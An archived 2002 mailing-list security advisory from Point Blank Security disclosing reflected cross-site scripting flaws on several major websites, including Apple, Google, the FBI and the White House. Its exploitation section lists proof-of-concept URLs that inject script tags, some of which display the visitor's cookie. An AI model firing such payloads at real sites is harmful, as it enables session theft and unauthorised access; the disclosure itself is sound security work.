Vulnerability Development mailing list archives

Cross Site Scripting Vulnerabilities on Major Websites

From: "Jeremiah J. Jacks" <jer () pointblanksecurity com>
Date: Fri, 8 Mar 2002 10:25:39 -0800

Point Blank Security Notice
Friday, March 08, 2002

Title:    Cross Site Scripting Vulnerabilities on Major Websites
Advisory: PBS0302001

Author:       Jeremiah Jacks, Point Blank Security
Contributors: Gary Jones, Point Blank Security
                Dmitry Golubev, Point Blank Security

Summary:  http://www.cert.org/archive/pdf/cross_site_scripting.pdf

Disclaimer:
 This information is provided "AS IS". Point Blank Security and the
 author of this document disclaim all warranties, express and implied,
 with regard to this information. This information is provided only for
 legitimate security analysis purposes. Point Blank Security and the
 author does not condone the unauthorized access of systems, and
 specifically prohibits the use or reproduction of this information
 for such purposes. In no event shall Point Blank Security or the author
 be liable for any damages whatsoever arising out of or in connection
 with the use or dissemination of this information. Any use of this
 information is at the user's own risk.

Exploitation:

Apple
 01)
http://search03.apple.com/search97cgi/s97_cgi?Action=FilterSearch&Filter=";><
script>alert("Point+Blank+Security");</script>
 Credit: Gary Jones

Barnes & Noble
 01)
http://shop.barnesandnoble.com/booksearch/results.asp?WRD=<script>alert(docu
ment.cookie);</script>
 Credit: Gary Jones

The White House
 01)
http://www.whitehouse.gov/cgi-bin/good-bye.cgi?url=<script>alert("Point+Blan
k+Security");</script>
 Credit: Dmitry Golubev

The FBI
 01)
http://www.fbi.gov/cgi-bin/outside.cgi?<script>alert("Point+Blank+Security")
;</script>
 Credit: Dmitry Golubev

Google
 01)
http://www.google.com/search?q=pointblanksecurity.com/";><script>alert(docume
nt.cookie)</script>
 Credit: Jeremiah Jacks

Alta Vista
 02)
http://www.altavista.com/sites/search/web?q=<script>alert('ytiruceS+knalB+tn
ioP');</script>
 Credit: Jeremiah Jacks

More Examples At: http://www.pointblanksecurity.com/css/

Current thread:

Cross Site Scripting Vulnerabilities on Major Websites Jeremiah J. Jacks (Mar 08)
- <Possible follow-ups>
- Re: Cross Site Scripting Vulnerabilities on Major Websites alrferreira (Mar 08)